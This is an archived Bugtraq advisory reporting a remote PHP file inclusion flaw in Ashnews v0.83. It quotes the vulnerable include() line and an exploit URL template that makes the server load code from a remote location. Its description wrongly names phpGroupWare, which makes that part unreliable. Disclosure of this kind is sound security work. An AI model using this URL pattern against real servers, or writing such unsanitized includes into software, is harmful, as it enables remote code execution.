[30838] in bugtraq
sorry, wrong file
daemon@ATHENA.MIT.EDU (phil dunn)
Tue Jul 22 12:59:54 2003
Date: 22 Jul 2003 15:05:29 -0000
Message-ID: <20030722150529.6557.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: phil dunn <z3hp@yahoo.com>
To: bugtraq@securityfocus.com
######################################################
## Name: Phil Dunn ##
## Email: z3hp@yahoo.com ##
## Date: July - 20 - 2003 ##
## Program: Ashnews v0.83 ##
## Version: v0.83 ##
##Vendor Name: AshWebStudio ##
## Vendor URL: http://projects.ashwebstudio.com/ ##
######################################################
An include file vulnerability was found in phpGroupWare. This exploit
works for all Branches. A remote
user can create arbitrary PHP code and locate it on a remote server. Then,
the remote user can issue a
specially crafted URL to the target server that specifies the remote PHP
code for inclusion.
ashnews.php & ashheadlines.php @ line 14
-----------------------------------------------
include($pathtoashnews."ashprojects/newsconfig.php");
-----------------------------------------------
Exploit:
http://[server]/[ashweb dir]/ashnews.php?pathtoashnews=[remote location]
